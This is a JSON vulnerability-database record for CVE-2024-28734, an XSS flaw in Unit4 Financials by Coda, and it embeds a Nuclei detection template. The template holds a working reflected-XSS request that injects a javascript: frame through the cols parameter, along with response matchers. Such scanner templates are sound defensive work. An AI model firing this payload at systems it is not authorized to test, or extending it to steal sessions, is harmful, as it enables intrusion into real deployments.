{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-28734/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-28734/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-28734/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-28734/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-28734/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-28734"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-28734"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-28734.yaml",
    "nuclei_template_severity": "medium",
    "nuclei_template_yaml": "id: CVE-2024-28734\n\ninfo:\n  name: Coda v.2024Q1 - Cross-Site Scripting\n  author: s4e-io\n  severity: medium\n  description: |\n    Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter.\n  impact: |\n    Attackers can inject malicious scripts that execute in users' browsers, potentially stealing credentials or performing unauthorized actions.\n  remediation: |\n    Update Coda to version 2024Q2 or later that addresses the XSS vulnerability.\n  reference:\n    - https://packetstormsecurity.com/files/177619/Financials-By-Coda-Cross-Site-Scripting.html\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28734\n    - http://financials.com\n    - http://unit4.com\n  classification:\n    epss-score: 0.01791\n    epss-percentile: 0.77404\n  metadata:\n    max-request: 1\n  tags: packetstorm,cve,cve2024,coda,xss,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /coda/frameset?cols=\"><frame%20src=\"javascript:alert(document.domain)\"> HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '<frameset cols=\"\"><frame src=\"javascript:alert(document.domain)\">'\n\n      - type: word\n        part: header\n        words:\n          - \"text/html\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a00463044022037152b98d2bebe28303803d7f4daa0c2bc4191dfb42dc461905db36ffb49cbbf02205595408361e9c8ec2bb610db99f62ef9ecffe18d44ac7504514f5adca7cd80b7:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-28734"
}